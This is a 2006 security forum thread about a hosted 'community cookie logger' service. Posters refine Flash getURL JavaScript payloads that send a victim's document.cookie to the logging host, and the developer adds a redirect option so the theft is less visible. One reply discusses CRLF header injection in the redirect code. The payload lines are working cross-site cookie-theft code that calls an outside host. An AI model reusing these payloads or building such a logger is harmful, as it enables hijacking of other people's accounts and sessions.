Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Community cookie logger - For WhiteAcid
Posted by: rsnake
Date: October 09, 2006 11:36AM

Hey, WhiteAcid, I got an interesting email today (here's a snippet):

only way i get the hack to work is like this:
getURL("javascript:void(document.images[67].src=\'http://ccl.whiteacid.org/log.php?[removed]\'+document.cookie);","");

which replaces one of the images, and thus is ugly..


Anyway... I was thinking you could probably add one more value onto this (a URL) to return the user to. Of course that makes a redirect hole, but will allow people to return to the correct image that they were replacing. Just a thought.



Edited 1 time(s). Last edit at 10/10/2006 06:03PM by rsnake.

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: WhiteAcid
Date: October 09, 2006 01:23PM

uhm... I have set up http://wiki.whiteacid.org/CCL for people to post suggestions in. This is something I've been wanting to do for a while... but been too lazy to do.

I see he's using flash.. neat. Can't he use several consectuive commands such as:
getURL("javascript:i=new Image()","")
getURL("javascript:i.src="'http://ccl.whiteacid.org/log.php?[removed]'+document.cookie","")

Well... I suppose I should get off my butt and sort this out.
So... to prevent people injecting stuff I don't want them to do in the following line:
header("location: http://".$url);
Should I just make sure $url contains no %0a or %0d characters?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 10/10/2006 06:28PM by WhiteAcid.

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: rsnake
Date: October 09, 2006 04:12PM

Yah, I think allowing special through it would be bad unless you reflected it as encoded (and didn't try to decode it to it's equivalant). Sorry, I didn't know the Wiki had that or I would have posted it there. Yah, I suggested something like that myself (importing non-existant CSS files or whatever). It was just a suggestion from the peanut gallery. Take it with a grain of salt.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: WhiteAcid
Date: October 09, 2006 05:35PM

Don't worry about the wiki, I don't really care about that. This is something that has been asked of me for a while, and even though it's open source no one else seems to want to do it. I'll get my arse in gear and sort it out tonight or tomorrow. If no forwarding url is provided I'll wall back to a 1x1 transparent gif image.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: rsnake
Date: October 09, 2006 05:44PM

That would probably solve the issue most of the time anyway... 1x1 pixel tracking images are pretty common. I bet that solves most of the issue right there.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: metal_hurlant
Date: October 09, 2006 07:25PM

You can't run several getURL() commands on the same target window in rapid succession, as the browser will override the earlier one with the later, and only execute that one.

You have the right idea with new Image, though. The following shoudl work
getURL("javascript:(new Image).src='http://ccl.whiteacid.org/log.php?314159'+document.cookie");


BTW, apparently since PHP 4.4.3 and PHP 5.1, the header() command rejects attempts to insert more than one header line per command. I guess this HTTP response splitting thing is getting old.

--
Metal http://metal.hurlant.com/
"I can stop whenever I want"



Edited 1 time(s). Last edit at 10/10/2006 06:05PM by metal_hurlant.

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: WhiteAcid
Date: October 09, 2006 08:41PM

Sweet. I just tested this on my localhost. I tried loading:
http://127.0.0.1/header.php?a=http://www.google.com%0aasd
The returned page was:
Quote

Warning: Header may not contain more than a single header, new line detected. in C:\www\header.php on line 2
Sweet. awesome. Thanks for that.

Back to the flash thing, since it's loading a javascript: url I think it would work, but no way can I be arsed to test it out. I think that it'd load the first getURL, set i = a new image object, then load the second getURL and set it's source attribute. Since the parent page isn't reloading the variables should stay there.

Update:
Quote
http://ccl.whiteacid.org
As of version 1.1.3 an optional parameter can be passed in the querystring. You can pass ccl_redirect in the query string and set it equal to a url. The url should be a full url (minus the starting http:// bit). This is the url the script will forward the user to once the logging has been done.
If not specified it'll default to /transp.gif, which is a 1x1 transparent .gif image.
It's done

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 10/09/2006 08:59PM by WhiteAcid.

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: huib
Date: October 10, 2006 01:51PM

it was me who requested it lol;)
thnx alot for all the comments.. and, i tried ALOT, i tried to change the script source, but for some reason that just didnt work:(
thnx alot for the changes whiteacid, owe you one!:D

~huib

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: WhiteAcid
Date: October 10, 2006 02:08PM

Glad I could help :)

Rsnake, think you could remove the userid from the initial post? I'd just prefer all the users to be totally anonymous.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Community cookie logger - For WhiteAcid
Posted by: rsnake
Date: October 10, 2006 06:04PM

You got it. "Information must be free" "Okay, give me your userids/passwords, SS#, credit cards, pins, address, mother's maiden name, favorite color..."

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.